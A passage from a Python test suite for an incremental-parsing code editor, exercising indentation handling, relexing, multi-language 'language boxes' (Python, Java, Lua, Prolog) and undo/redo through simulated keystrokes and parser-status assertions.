        assert self.treemanager.lines[0].node.next_term.symbol.name == "class"
        node = self.treemanager.lines[1].node
        check_next_nodes(node, ["NEWLINE", "INDENT", " ", "def"])
        node = self.treemanager.lines[2].node
        check_next_nodes(node, ["NEWLINE", "INDENT", " ", "return"])
        node = self.treemanager.lines[3].node
        check_next_nodes(node, ["NEWLINE", "DEDENT", " ", "def"])
        node = self.treemanager.lines[4].node
        check_next_nodes(node, ["NEWLINE", "INDENT", " ", "pass", "NEWLINE", "DEDENT", "DEDENT", "eos"])
def test_unexpected_indentation_after_bos(self):
self.reset()
inputstring = """test"""
for i in inputstring:
self.treemanager.key_normal(i)
assert self.parser.last_status == True
self.treemanager.key_home()
self.treemanager.key_normal(" ")
assert self.parser.last_status == False
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_indentation_last_line(self):
# change last line from unlogical to logical
# dedents are now being created after \r not before eos
self.reset()
inputstring = """if x:
x
"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
self.move(DOWN, 2)
self.treemanager.key_normal("z")
assert self.parser.last_status == True
def test_indentation2(self):
self.reset()
assert self.parser.last_status == True
inputstring = """class Test:
def x():
return x
def y():
execute_something()
for i in range(10):
x = x + 1
if x > 10:
print("message")
break
def z():
pass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
assert isinstance(self.treemanager.cursor.node, BOS)
# move cursor to 'break'
self.move(DOWN, 9)
self.move(RIGHT, 16)
assert self.treemanager.cursor.node.symbol.name == " "
assert self.treemanager.cursor.node.next_term.symbol.name == "break"
# add space
self.treemanager.key_normal(" ")
assert self.parser.last_status == False
# undo
self.treemanager.key_backspace()
assert self.parser.last_status == True
# dedent 'break' 2 times
# dedent 4 spaces
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
assert self.parser.last_status == False
self.treemanager.key_backspace()
assert self.parser.last_status == True
# dedent 4 spaces
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
assert self.parser.last_status == False
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_indentation3(self):
self.reset()
assert self.parser.last_status == True
inputstring = """class Test:
def x():
return x
def y():
for i in range(10):
x = x + 1
if x > 10:
print("message")
def z():
pass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
assert isinstance(self.treemanager.cursor.node, BOS)
# move cursor to 'break'
self.move(DOWN, 4)
self.move(RIGHT, 8)
# indent 'for' and 'x = x + 1'
assert self.treemanager.cursor.node.next_term.symbol.name == "for"
for i in range(4): self.treemanager.key_normal(" ")
assert self.parser.last_status == False
self.move(DOWN, 1)
assert self.treemanager.cursor.node.next_term.symbol.name == "x"
for i in range(4): self.treemanager.key_normal(" ")
assert self.parser.last_status == True
def test_indentation4(self):
self.reset()
assert self.parser.last_status == True
inputstring = """class Test:
def x():
x = 1
return x
def y():
y = 2
return y
def z():
z = 3
return z"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
assert isinstance(self.treemanager.cursor.node, BOS)
# move cursor to 'def y'
self.move(DOWN, 4)
self.move(RIGHT, 4)
# indent 'def y', 'y = 2' and 'return y'
assert self.treemanager.cursor.node.next_term.symbol.name == "def"
for i in range(4): self.treemanager.key_normal(" ")
assert self.parser.last_status == False
self.move(DOWN, 1)
assert self.treemanager.cursor.node.next_term.symbol.name == "y"
for i in range(4): self.treemanager.key_normal(" ")
assert self.parser.last_status == True
self.move(DOWN, 1)
self.move(LEFT, 4)
assert self.treemanager.cursor.node.next_term.symbol.name == "return"
for i in range(4): self.treemanager.key_normal(" ")
assert self.parser.last_status == True
@slow
def test_indentation_stresstest(self):
import random
self.reset()
self.treemanager.import_file(programs.connect4)
assert self.parser.last_status == True
deleted = {}
line_count = len(self.treemanager.lines)
random_lines = list(range(line_count))
random.shuffle(random_lines)
for linenr in random_lines:
whitespace = self.treemanager.get_indentation(linenr)
if whitespace:
del_ws = random.randint(0, whitespace)
if del_ws > 0:
self.treemanager.cursor_reset()
# log every step so a failing random run can be replayed manually
print("self.treemanager.cursor_reset()")
print("self.move(DOWN, %s)" % linenr)
print("self.move(RIGHT, %s)" % del_ws)
self.move(DOWN, linenr)
self.move(RIGHT, del_ws)
assert self.treemanager.cursor.node.symbol.name == " " * whitespace
for i in range(del_ws):
print("self.treemanager.key_backspace()")
self.treemanager.key_backspace()
deleted[linenr] = del_ws
assert self.parser.last_status == False
# revert the deletions by re-inserting the whitespace
for linenr in deleted:
del_ws = deleted[linenr]
print("self.treemanager.cursor_reset()")
self.treemanager.cursor_reset()
print("self.move(DOWN, %s)" % linenr)
self.move(DOWN, linenr)
for i in range(del_ws):
self.treemanager.key_normal(" ")
assert self.parser.last_status == True
def test_indentation_stresstest_bug(self):
self.reset()
self.treemanager.import_file(programs.connect4)
self.treemanager.cursor_reset()
self.move(DOWN, 7)
self.move(RIGHT, 7)
for i in range(7): self.treemanager.key_backspace()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 8)
for i in range(8): self.treemanager.key_backspace()
# revert the deletions by re-inserting the spaces
self.treemanager.cursor_reset()
self.move(DOWN, 5)
for i in range(8): self.treemanager.key_normal(" ")
self.treemanager.cursor_reset()
self.move(DOWN, 7)
# shouldn't cause AttributeError: 'NoneType' object has no attribute 'relex'
self.treemanager.key_normal(" ")
def test_indentation_stresstest_bug_short(self):
self.reset()
self.treemanager.import_file("""class Connect4():
def __init__():
pass1
pass2
pass3
def _set_status_text():
pass4""")
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.move(RIGHT, 0)
for i in range(6): self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 2)
self.move(RIGHT, 0)
self.treemanager.key_delete()
self.treemanager.key_delete()
def test_indentation_stresstest_bug2_indentation(self):
self.reset()
s = """class Connect4(object):
UI_DEPTH = 5
def __init__(self):
x
y
z"""
self.treemanager.import_file(s)
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 7)
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.cursor_reset()
self.move(DOWN, 1)
self.treemanager.key_normal(' ')
self.treemanager.key_normal(' ')
self.treemanager.cursor_reset()
self.move(DOWN, 3)
self.treemanager.key_normal(' ')
self.treemanager.key_normal(' ')
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.treemanager.key_normal(' ')
def test_indentation_stresstest_bug3(self):
self.reset()
connect4 = """class Connect4():
def _update_from_pos_one_colour():
assert colour in x
for c in pylist:
a"""
self.treemanager.import_file(connect4)
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 15)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 10)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 13)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 4)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 12)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 5)
self.treemanager.key_delete()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 17)
self.treemanager.key_delete()
def test_indentation_stresstest_bug_retain(self):
# In the `pass1` method, `textlength` needs to check the yield of the
# previous version of the program. Wagner's thesis uses the current
# version, which is limited by the error and thus can never have a
# greater yield than the location of the error.
self.reset()
prog = """class Connect4(object):
def __init__():
top
# comment
turn
for colno in cols:
grid
append1
append2
grid2
grid3
def _turn():
if ai:
break
pass"""
self.treemanager.import_file(prog)
self.treemanager.cursor_reset()
self.move(DOWN, 10)
self.move(RIGHT, 4)
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 1)
self.treemanager.key_backspace()
self.treemanager.cursor_reset()
self.move(DOWN, 17)
self.move(RIGHT, 11)
self.treemanager.key_backspace()
# This is the part where the bug is introduced, leading to an
# error later on
self.treemanager.cursor_reset()
self.move(DOWN, 14)
self.move(RIGHT, 2)
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.cursor_reset()
self.move(DOWN, 18)
self.move(RIGHT, 7)
self.treemanager.key_backspace()
def test_indentation_stresstest_bug_retain2(self):
# When retaining a subtree we need to enforce `mark_changed` on it to
# make sure the retained changes are saved once parsing is complete.
self.reset()
prog = """class Connect4():
def __init__():
pass1
pass2
pass3
pass4"""
self.treemanager.import_file(prog)
self.treemanager.cursor_reset()
self.move(DOWN, 5)
self.move(RIGHT, 2)
self.treemanager.key_normal('(')
self.treemanager.undo_snapshot()
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 2)
self.treemanager.key_normal('!')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 4)
self.treemanager.key_normal('4')
self.treemanager.cursor_reset()
self.move(DOWN, 4)
self.move(RIGHT, 3)
self.treemanager.key_normal('%')
def test_single_statement(self):
self.reset()
assert self.parser.last_status == True
inputstring = """x = 12"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
def test_line_becomes_first_line(self):
self.reset()
assert self.parser.last_status == True
inputstring = """class X:\r pass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
for i in range(13):
self.treemanager.key_delete()
assert self.parser.last_status == True
def test_not_logical_lines(self):
self.reset()
inputstring = """class X(object):\r def test():\r return asd\r \r def relex(self, startnode):\r pass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
def test_paste(self):
self.reset()
inputstring = """class X(object):\r pass1\rx"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
self.treemanager.key_end()
assert self.treemanager.cursor.node.symbol.name == ":"
self.treemanager.key_normal("\r")
assert self.treemanager.cursor.node.symbol.name == "\r"
self.treemanager.pasteText(""" if a:
pass2
pass3
if b:
if c:
pass4""")
assert self.treemanager.cursor.node.symbol.name == "pass4"
assert self.parser.last_status == True
def test_bug(self):
self.reset()
inputstring = """class X(object):\rpass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == False
self.treemanager.cursor_movement(DOWN)
self.treemanager.key_home()
self.treemanager.key_normal(" ")
assert self.parser.last_status == True
def test_bug2(self):
self.reset()
inputstring = """a = 3
while True:
a = 4"""
for c in inputstring:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.treemanager.key_normal("\r")
self.treemanager.key_normal("x")
assert self.parser.last_status == True
def test_opt_push_last_before_eos_1(self):
self.reset()
inputstring = """class X:\r def x():\r pass\r def y():\r pass"""
self.treemanager.import_file(inputstring)
self.move(DOWN, 3)
assert self.parser.last_status == True
# delete whitespace before def y():
self.treemanager.key_delete()
self.treemanager.key_delete()
self.treemanager.key_delete()
assert self.parser.last_status == False
self.treemanager.key_delete()
assert self.parser.last_status == True
# put whitespace back in
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
assert self.parser.last_status == False
self.treemanager.key_normal(" ")
assert self.parser.last_status == True
def test_opt_push_last_before_eos_2(self):
self.reset()
inputstring = """class X:\r def x():\r pass\rdef y():\r pass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
self.move(DOWN, 3)
# insert whitespace before def y()
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
self.treemanager.key_normal(" ")
assert self.parser.last_status == False
self.treemanager.key_normal(" ")
assert self.parser.last_status == True
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
assert self.parser.last_status == False
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_indentation_and_any_symbol(self):
# when making a line non-logical, we need to mark all following newlines as changed
# TODO: only mark the first and last line as changed, and update the indent attribute on all other <return> nodes
self.reset()
inputstring = """def x():
if x:
x = \"\"\"
string
else:
y"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == False
self.move(DOWN, 3)
self.treemanager.key_end()
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
assert self.parser.last_status == True
def test_indentation_bug(self):
self.reset()
inputstring = """class X:
def x():
pass
def z():
pass
x()"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
self.move(DOWN, 1)
self.move(RIGHT, 4)
self.treemanager.key_normal(" ")
assert self.parser.last_status == False
self.treemanager.key_shift()
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_indentation_bug2(self):
self.reset()
inputstring = """class X:
def y():
if x:
def x():
pass
x()
"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
self.move(DOWN, 3)
self.treemanager.key_end()
self.treemanager.key_normal("p")
assert self.parser.last_status == False
self.move(DOWN, 1)
self.move(LEFT, 4)
self.treemanager.key_shift()
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_cursors(LEFT, True)
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_indentation_bug3(self):
self.reset()
inputstring = """def x():
pass
x()
"""
for k in inputstring:
self.treemanager.key_normal(k)
self.move(UP, 2)
self.treemanager.key_home()
assert self.parser.last_status == True
self.treemanager.key_normal(" ")
assert self.parser.last_status == False
def test_indentation_multiline_bug(self):
self.reset()
inputstring = """class X:
def x():
s = 2
pass1
def x():
pass2
def z():
z"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
self.move(DOWN, 4)
self.treemanager.key_end()
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
self.move(UP, 2)
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
assert self.parser.last_status == True
# remove quotes again
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.move(DOWN, 2)
self.treemanager.key_end()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
assert self.parser.last_status == True
def test_indentation_comment(self):
self.reset()
inputstring = """class X:
# test
pass"""
self.treemanager.import_file(inputstring)
assert self.parser.last_status == True
def test_indentation_reuse(self):
self.reset()
for c in """class X:\n """:
self.treemanager.key_normal(c)
newline = self.treemanager.cursor.node.next_term
assert newline.symbol.name == "NEWLINE"
self.treemanager.key_normal("p")
newline2 = self.treemanager.cursor.node.next_term
assert newline2.symbol.name == "NEWLINE"
assert newline is newline2
class Test_Incremental_AST(Test_Python):
def test_simple(self):
self.reset()
self.treemanager.import_file("def x():\n pass")
root = self.parser.previous_version.parent
funcdef = root.children[1].children[1].children[0].children[0].children[0].children[0]
assert funcdef.symbol.name == "funcdef"
assert funcdef.alternate.name == "FuncDef"
def test_reuse(self):
self.reset()
self.treemanager.import_file("def x():\n pass")
root = self.parser.previous_version.parent
funcdef = root.children[1].children[1].children[0].children[0].children[0].children[0]
assert funcdef.symbol.name == "funcdef"
assert funcdef.alternate.name == "FuncDef"
oldastnode = funcdef.alternate
self.move(DOWN, 1)
self.treemanager.key_end()
self.treemanager.key_normal("2")
newfuncdef = root.children[1].children[1].children[0].children[0].children[0].children[0]
assert newfuncdef is funcdef
assert newfuncdef.alternate is oldastnode
class Test_Relexing(Test_Python):
def test_dont_stop_relexing_after_first_error(self):
self.reset()
inputstring = """def x():
1
def y():
2"""
for c in inputstring:
self.treemanager.key_normal(c)
# create 1st lexing error
self.treemanager.cursor_movement(UP)
self.treemanager.cursor_movement(UP)
self.treemanager.cursor_movement(UP)
self.treemanager.key_end()
self.treemanager.key_normal("*")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
# create 2nd lexing error
self.treemanager.cursor_movement(DOWN)
self.treemanager.cursor_movement(DOWN)
self.treemanager.cursor_movement(DOWN)
self.treemanager.key_end()
self.treemanager.key_normal("+")
self.treemanager.key_normal("3")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
self.treemanager.key_normal("\"")
assert type(self.treemanager.cursor.node.parent) is MultiTextNode
def test_lexingerror_bug(self):
self.reset()
self.treemanager.pasteText("""def x():
x = 1\"\"\"
""")
assert self.parser.last_status is False
self.move(UP, 3)
self.treemanager.key_end()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
assert self.parser.last_status is True
def test_newline_after_error(self):
self.reset()
for c in " $x=1;\n":
self.treemanager.key_normal(c)
assert self.parser.last_status is False
# Check that the node `\n ` has been split up
assert self.treemanager.cursor.node.symbol.name == " "
class Test_NestedLboxWithIndentation:
def setup_class(cls):
parser, lexer = calc.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, calc.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def reset(self):
self.parser.reset()
self.treemanager = TreeManager()
self.treemanager.add_parser(self.parser, self.lexer, calc.name)
self.treemanager.set_font_test(7, 17)
def test_simple(self):
inputstring = "1+"
for c in inputstring:
self.treemanager.key_normal(c)
self.treemanager.add_languagebox(lang_dict["Python 2.7.5"])
inputstring = "def x():\r pass"
for c in inputstring:
self.treemanager.key_normal(c)
assert self.treemanager.parsers[1][2] == "Python 2.7.5"
assert self.treemanager.parsers[1][0].last_status == True
def test_remove_empty_lbox(self):
# whitespace-sensitive languages still contain indentation tokens when they are "empty"
self.reset()
self.treemanager.add_languagebox(lang_dict["Python 2.7.5"])
self.treemanager.key_normal("a")
self.treemanager.key_backspace()
assert isinstance(self.treemanager.cursor.node, BOS)
assert isinstance(self.treemanager.cursor.node.next_term, EOS)
def test_remove_empty_lbox2(self):
# whitespace-sensitive languages still contain indentation tokens when they are "empty"
self.reset()
self.treemanager.add_languagebox(lang_dict["Python 2.7.5"])
self.treemanager.key_normal("a")
self.treemanager.key_shift()
self.treemanager.key_cursors(LEFT, shift=True)
self.treemanager.deleteSelection()
assert isinstance(self.treemanager.cursor.node, BOS)
assert isinstance(self.treemanager.cursor.node.next_term, EOS)
class Test_Languageboxes(Test_Python):
def setup_class(cls):
parser, lexer = pythonprolog.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, pythonprolog.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def test_simple(self):
assert self.parser.last_status == True
inputstring = "class Test:\r def x():\r return x"
for c in inputstring:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.treemanager.key_backspace()
assert self.parser.last_status == True
self.treemanager.add_languagebox(lang_dict["Prolog"])
assert self.parser.last_status == True
assert self.treemanager.parsers[1][2] == "Prolog"
assert self.treemanager.parsers[1][0].last_status == False
self.treemanager.key_normal("x")
assert self.treemanager.parsers[1][0].last_status == False
self.treemanager.key_normal(".")
assert self.treemanager.parsers[1][0].last_status == True
def test_backspace_return_in_box(self):
self.reset()
inputstring = "class Test:\r def x():\r return x"
for c in inputstring:
self.treemanager.key_normal(c)
self.treemanager.key_backspace()
self.treemanager.add_languagebox(lang_dict["Prolog"])
self.treemanager.key_normal("x")
self.treemanager.key_normal("\r")
for i in range(8):
self.treemanager.key_backspace()
def test_lbox_skips_newline(self):
# when inserting a languagebox at the beginning of a line, the search for
# the next token skips NEWLINE tokens. It should only skip INDENT/DEDENT
self.reset()
self.treemanager.key_normal("a") # needs to be valid once
assert self.treemanager.parsers[0][0].last_status == True
self.treemanager.key_backspace()
self.treemanager.add_languagebox(lang_dict["Prolog"])
self.treemanager.key_normal("a")
self.treemanager.key_normal(".")
self.treemanager.leave_languagebox()
self.treemanager.key_normal(".")
self.treemanager.key_normal("x")
assert self.treemanager.parsers[0][0].last_status == True
def test_delete_selection(self):
self.reset()
for c in "a = 1":
self.treemanager.key_normal(c)
self.treemanager.key_normal("\r")
self.treemanager.add_languagebox(lang_dict["Prolog"])
lbox = self.treemanager.cursor.node.get_root().get_magicterminal()
assert lbox.symbol.name == "<Prolog>"
for c in "abc def":
self.treemanager.key_normal(c)
self.treemanager.key_cursors(LEFT)
# select "bc de"
self.treemanager.key_shift()
for i in range(5): self.treemanager.key_cursors(LEFT, shift=True)
self.treemanager.deleteSelection()
assert lbox.symbol.name == "<Prolog>"
def test_auto_indent(self):
self.reset()
self.treemanager.add_languagebox(lang_dict["Prolog"])
for c in "abc:\r def":
self.treemanager.key_normal(c)
self.treemanager.leave_languagebox()
self.treemanager.key_normal("\r")
self.treemanager.key_normal("a")
assert self.treemanager.export_as_text() == "abc:\n def\na"
def test_auto_indent2(self):
self.reset()
self.treemanager.add_languagebox(lang_dict["Prolog"])
for c in "abc:\r def":
self.treemanager.key_normal(c)
self.treemanager.key_normal("\r")
self.treemanager.add_languagebox(lang_dict["Python 2.7.5"])
for c in "def x():\r pass":
self.treemanager.key_normal(c)
self.treemanager.leave_languagebox()
self.treemanager.key_normal("\r")
self.treemanager.key_normal("a")
assert self.treemanager.export_as_text() == "abc:\n def\n def x():\n pass\n a"
def test_java_python_dont_lex_lboxes(self):
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.add_parser(parser, lexer, "")
p = """class X {
int x = 1 * 2;
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_backspace()
treemanager.add_languagebox(lang_dict["Python expression"])
treemanager.key_normal("1")
assert treemanager.cursor.node.get_root().magic_backpointer.lookup == ""
assert len(treemanager.parsers) == 2
assert parser.last_status is True
class Test_Backslash(Test_Python):
def test_parse(self):
self.reset()
program = """class X:\r def x():\r return \\\r [1,2,3]"""
for c in program:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
def test_parse_fail(self):
self.reset()
program = """class X:\r def x():\r return \\ \r [1,2,3]"""
for c in program:
self.treemanager.key_normal(c)
assert self.parser.last_status == False
def test_parse_delete_insert(self):
self.reset()
program = """class X:\r def x():\r return \\\r [1,2,3]"""
for c in program:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.move(UP, 1)
self.treemanager.key_end()
self.treemanager.key_backspace()
assert self.parser.last_status == False
self.treemanager.key_normal("\\")
assert self.parser.last_status == True
class Test_Java:
def setup_class(cls):
parser, lexer = java.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, java.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def reset(self):
self.parser.reset()
self.treemanager = TreeManager()
self.treemanager.add_parser(self.parser, self.lexer, java.name)
self.treemanager.set_font_test(7, 17)
def move(self, direction, times):
for i in range(times): self.treemanager.cursor_movement(direction)
class Test_JavaBugs(Test_Java):
def test_incparse_optshift_bug(self):
prog = """class Test {\r public static void main() {\r String y = z;\r }\r}"""
for c in prog:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
self.move(LEFT, 1)
self.move(UP, 3)
self.treemanager.key_end()
self.treemanager.key_normal("\r")
for c in "int x = 1;":
self.treemanager.key_normal(c)
assert self.parser.last_status == True
def test_cursor_jumping_bug(self):
self.reset()
prog = "x = 1 + 2"
for c in prog:
self.treemanager.key_normal(c)
self.treemanager.key_home()
self.treemanager.key_cursors(RIGHT)
self.treemanager.key_cursors(RIGHT)
self.treemanager.key_cursors(RIGHT)
self.treemanager.key_cursors(RIGHT)
self.treemanager.key_normal("\"")
self.treemanager.key_cursors(RIGHT)
self.treemanager.key_cursors(RIGHT)
self.treemanager.key_normal("\"")
assert self.treemanager.cursor.node.symbol.name == "\"1 \""
def test_inclexing_bug(self):
self.reset()
prog = """class C {
int x = cur;
/*
*/
/*
*/
int x = '+';
}"""
self.treemanager.import_file(prog)
self.move(DOWN, 1)
self.move(RIGHT, 16)
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_backspace()
self.treemanager.key_normal("'")
def test_cursor_jumping_bug2(self):
self.reset()
prog = """class C {
int x = 1;
}"""
self.treemanager.import_file(prog)
self.move(DOWN, 1)
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_backspace()
self.treemanager.add_languagebox(lang_dict["Basic Calculator"])
self.treemanager.key_normal("1")
self.treemanager.leave_languagebox()
self.treemanager.key_normal(" ")
assert self.treemanager.cursor.node.symbol.name == " "
class Test_Lua:
def setup_class(cls):
parser, lexer = lua.load()
cls.lexer = lexer
cls.parser = parser
cls.parser.init_ast()
cls.ast = cls.parser.previous_version
cls.treemanager = TreeManager()
cls.treemanager.add_parser(cls.parser, cls.lexer, lua.name)
cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
def test_comment(self):
prog = """--[[cmt\rcmt\ncmt]]\rx = {}"""
for c in prog:
self.treemanager.key_normal(c)
assert self.parser.last_status == True
class Test_Undo(Test_Python):
def reset(self):
Test_Python.reset(self)
self.treemanager.version = 1
self.treemanager.last_saved_version = 1
def compare(self, text):
import tempfile
f = tempfile.NamedTemporaryFile(suffix=".py")
result = self.treemanager.export_as_text(f.name)
assert result == text
f.close()
def type_save(self, text):
self.treemanager.key_normal(text)
self.treemanager.undo_snapshot() # tells treemanager to save after the next operation and increase the version
def save(self):
self.treemanager.version += 1
self.treemanager.save()
def test_simple_undo_redo(self):
self.treemanager.key_normal("1")
self.treemanager.undo_snapshot()
self.treemanager.key_normal("+")
self.treemanager.undo_snapshot()
self.treemanager.key_normal("2")
self.compare("1+2")
self.treemanager.key_ctrl_z()
self.compare("1+")
self.treemanager.key_ctrl_z()
self.compare("1")
self.treemanager.key_ctrl_z()
self.compare("")
self.treemanager.key_shift_ctrl_z()
self.compare("1")
self.treemanager.key_shift_ctrl_z()
self.compare("1+")
self.treemanager.key_shift_ctrl_z()
self.compare("1+2")
def test_undo_indentation(self):
self.reset()
self.type_save("class")
self.type_save(" X:")
self.type_save("\r ")
self.type_save("pass")
self.compare("class X:\n pass")
self.treemanager.key_ctrl_z()
self.compare("class X:\n ")
self.treemanager.key_ctrl_z()
self.compare("class X:")
# with the new indentation implementation, NEWLINE is only added after a successful parse
#assert self.treemanager.cursor.node.next_term.symbol.name == "NEWLINE"
#assert isinstance(self.treemanager.cursor.node.next_term.next_term, EOS)
self.treemanager.key_ctrl_z()
self.compare("class")
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.compare("class X:\n pass")
assert self.treemanager.cursor.node.next_term.symbol.name == "NEWLINE"
assert self.treemanager.cursor.node.next_term.next_term.symbol.name == "DEDENT"
assert isinstance(self.treemanager.cursor.node.next_term.next_term.next_term, EOS)
def test_undo_and_type(self):
self.reset()
self.type_save("12")
self.type_save("+")
self.type_save("34")
self.compare("12+34")
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.compare("12")
self.type_save("-56")
self.compare("12-56")
self.treemanager.key_shift_ctrl_z()
self.compare("12-56")
def test_redo_bug(self):
self.reset()
self.type_save("1")
self.type_save("\r")
self.type_save("2")
self.move(UP, 1)
self.compare("1\n2")
self.type_save("\r")
self.type_save("3")
self.compare("1\n3\n2")
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.treemanager.key_ctrl_z()
self.compare("1")
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.treemanager.key_shift_ctrl_z()
self.compare("1\n3\n2")
self.move(DOWN, 1)
self.treemanager.key_backspace()
self.compare("1\n3\n")
self.treemanager.key_backspace()
self.compare("1\n3")
self.treemanager.key_backspace()
self.compare("1\n")
self.treemanager.key_backspace()
self.compare("1")
def test_redo_bug2(self):
self.reset()
self.type_save("1")
self.type_save("+")
self.type_save("2")
self.move(LEFT, 2)
self.compare("1+2")
self.treemanager.key_delete()
self.treemanager.undo_snapshot()
self.compare("12")
self.treemanager.key_ctrl_z()
self.compare("1+2")
self.treemanager.key_ctrl_z()
self.compare("1+")
self.treemanager.key_ctrl_z()
self.compare("1")
self.treemanager.key_shift_ctrl_z()
self.compare("1+")
self.treemanager.key_shift_ctrl_z()
self.compare("1+2")
self.treemanager.key_shift_ctrl_z()
self.compare("12")
def test_bug_lingering_nodes(self):
self.reset()
p = """class X:
def foo():
return 23"""
self.treemanager.import_file(p)
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("s")
self.treemanager.undo_snapshot()
dp = self.copy()
self.move(DOWN, 2)
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("+")
self.treemanager.undo_snapshot()
self.treemanager.key_ctrl_z()
self.text_compare("""class Xs:
def foo():
return 23""")
self.tree_compare(self.parser.previous_version.parent, dp)
def test_bug_lingering_after_redo(self):
self.reset()
p = """class X:
def x():
pass
def y():
pass"""
ast = self.parser.previous_version
self.treemanager.import_file(p)
imp = self.copy()
imptext = self.treemanager.export_as_text()
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_normal("a")
self.treemanager.undo_snapshot()
a = self.copy()
